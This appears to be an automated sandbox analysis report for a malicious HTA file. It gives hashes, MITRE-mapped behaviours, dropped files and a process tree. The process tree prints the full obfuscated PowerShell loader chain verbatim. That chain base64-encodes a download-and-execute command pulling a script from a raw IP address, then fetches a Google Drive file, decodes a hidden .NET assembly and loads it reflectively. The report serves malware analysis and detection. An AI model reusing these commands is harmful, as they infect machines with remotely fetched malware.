Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30-10-2024 07:28
Static task
static1
Behavioral task
behavioral1
Sample
greatthingswithmegood.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
greatthingswithmegood.hta
Resource
win10v2004-20241007-en
General
-
Target
greatthingswithmegood.hta
-
Size
169KB
-
MD5
d61ef0038de65f697abb0b7a21b499db
-
SHA1
f8facfa18bf5eeecaa0601e8c1690fe60fe02ff8
-
SHA256
8762a9dea77db2f44207cc9edbc192f5776f7ac8532440ae60a65f5102f8ec93
-
SHA512
3ce0e7e8302d6b6c23ea209b07640be3b616306494d065c0293885bed194002f92bc41f4329f18465dd0ad77087afa6ce5a30a585e422f08a017306040986223
-
SSDEEP
48:4vaw5oZz7eWLB2rQOyeoCKcxyeoCKnAWUSl+WmpCzc/xJUdPePmkee7+SfitTFmE:4vG172ICeC4lw/HwSCirCtgQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 3020 POWeRSHell.eXE 6 1688 powershell.exe 8 1688 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1144 powershell.exe 1688 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 3020 POWeRSHell.eXE 2840 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 drive.google.com 5 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POWeRSHell.eXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3020 POWeRSHell.eXE 2840 powershell.exe 3020 POWeRSHell.eXE 3020 POWeRSHell.eXE 1144 powershell.exe 1688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3020 POWeRSHell.eXE Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 1144 powershell.exe Token: SeDebugPrivilege 1688 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2128 wrote to memory of 3020 2128 mshta.exe 31 PID 2128 wrote to memory of 3020 2128 mshta.exe 31 PID 2128 wrote to memory of 3020 2128 mshta.exe 31 PID 2128 wrote to memory of 3020 2128 mshta.exe 31 PID 3020 wrote to memory of 2840 3020 POWeRSHell.eXE 33 PID 3020 wrote to memory of 2840 3020 POWeRSHell.eXE 33 PID 3020 wrote to memory of 2840 3020 POWeRSHell.eXE 33 PID 3020 wrote to memory of 2840 3020 POWeRSHell.eXE 33 PID 3020 wrote to memory of 2788 3020 POWeRSHell.eXE 34 PID 3020 wrote to memory of 2788 3020 POWeRSHell.eXE 34 PID 3020 wrote to memory of 2788 3020 POWeRSHell.eXE 34 PID 3020 wrote to memory of 2788 3020 POWeRSHell.eXE 34 PID 2788 wrote to memory of 2916 2788 csc.exe 35 PID 2788 wrote to memory of 2916 2788 csc.exe 35 PID 2788 wrote to memory of 2916 2788 csc.exe 35 PID 2788 wrote to memory of 2916 2788 csc.exe 35 PID 3020 wrote to memory of 3052 3020 POWeRSHell.eXE 37 PID 3020 wrote to memory of 3052 3020 POWeRSHell.eXE 37 PID 3020 wrote to memory of 3052 3020 POWeRSHell.eXE 37 PID 3020 wrote to memory of 3052 3020 POWeRSHell.eXE 37 PID 3052 wrote to memory of 1144 3052 WScript.exe 38 PID 3052 wrote to memory of 1144 3052 WScript.exe 38 PID 3052 wrote to memory of 1144 3052 WScript.exe 38 PID 3052 wrote to memory of 1144 3052 WScript.exe 38 PID 1144 wrote to memory of 1688 1144 powershell.exe 40 PID 1144 wrote to memory of 1688 1144 powershell.exe 40 PID 1144 wrote to memory of 1688 1144 powershell.exe 40 PID 1144 wrote to memory of 1688 1144 powershell.exe 40
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatthingswithmegood.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\SysWOW64\windOWSPowerShell\V1.0\POWeRSHell.eXE"C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xml1hbew.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD36.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDD25.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2916
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59841f5225577e12df509ff76faccb1d9
SHA140776757450b02127b9e972506780ccddbdde2a6
SHA25691255d48af631144358634b31073251c245caaaf52a70ba69911d413391918dc
SHA512f515a9be38fd60c56de03f9433d558479b1d63107871e9e3ac84a7324e2f61e5ebebae58e3c76f6a2c928a21cc8abcf00bcb3796acac7c3c99c928fe5b2cae13
-
Filesize
3KB
MD59f4d36a0629887a89a5c687b84f072da
SHA1ea723f28c2d2b39a292ed36c6f3b4ac01cae49d9
SHA2569d9f106c98defab11611518d9be0d2ceb52b0a97319629810ca12a62f1ab2b73
SHA512ab108194298d50ebdf81ccdf19652be66aa8e3b04417b0692b40d4041e2176f265b569ed9577c11cd73fa03903b37f0d56a4f9ee1f72528819866fceedf1a140
-
Filesize
7KB
MD5119590a74736fcd5437f25f19fc71c59
SHA1e8c71704015f5622171d2be75e111c5874ba0e56
SHA256fe549840ae94091e8c88561e5fd5113596e1c1e67c9cfe7365dc22a213f40c69
SHA512937bd538faf4f44448c3311cd7f9eb2ade57083fb461087eab97819ac163f1a1a33cb9b8db2d8c8ff71aa5ca698611bb9bef59c2fd6a24c2df213dd64616399a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5f29a4de663746f1bd3852127e16f0e7d
SHA156223c0d57b285aa5c249233848729c414488253
SHA256226c60c4721e3d6b718bcde04498a68640f47c33e1beaf706d01e67e0b565028
SHA512681eb8548579ba553a672a7ab66945816c4e1cffa658b36f4588624a85c4e147314416936426f298c29faac1bfc08a85cd55f33e1a3ebbf5cb143a83634c4e1a
-
Filesize
138KB
MD564cc9748329c0e186cacd10d639615e6
SHA11291f245b185bd05fb09646b79f284d76e7dc0ff
SHA2562c5fffa8231f572e3a34b8d4ca675aec062c3accfe661519a28e376605c0479d
SHA51265ccbfe0223b58675aef7de997229f3ba66be892c851d6cec9018b941f3a5c5cac3c41fbe1878474213293ad25059b06e7ff7f0c4e3320d75a6fa7f071b646ba
-
Filesize
652B
MD54677a67ff87d3d1b62bd2e657af9524f
SHA103a825fcecf57e3a4b4d9cb718818b78b8b32ae7
SHA2567e278f6f2ada4fef5cb67aea63c4a2fe4eb3a591e6af1a7101bad7419aead8fe
SHA512bc3bf1fbe4588bf2ac0f85cc576833112ae2aff0f6b52bd304034e688f58ed6cbd59a5a70465c1980c3194857486de1e9e003580c3af809b2a9fdb40f9a2306c
-
Filesize
487B
MD58165df8b1b6d49c15b5e65811de25b8c
SHA1fbe4fe188254b23c8b57b8d1bcd56011a93f34ba
SHA256063172ff26517cdf762b144b713c24d423f75c6493234773c0e241c060dfa9f9
SHA512ede5171453ece61e25baf3eef0a842e92a2b2c47c06bd4ed416f9c0a42e2bbc29f1810b97e4041dcdfd53995fc0e268f20a39188db553cf272b0374994473a2d
-
Filesize
309B
MD583125231c2e2209ff9816d2ffe6b1185
SHA15969d1469da2fe9a057efd83a4ea7684c38b4a54
SHA2568cb719947ade46b73dea9415156cb5283dc22e7c04f4e784b493ce195fa93be2
SHA5129241a5cc3d2167eaad23f4ddb7102e5fdaf191c26947de0908542e0bb9fc5467d21aaf1d34b693c919a00f46544d2cc8c2f4057cb95630b8e190892d7efe4a60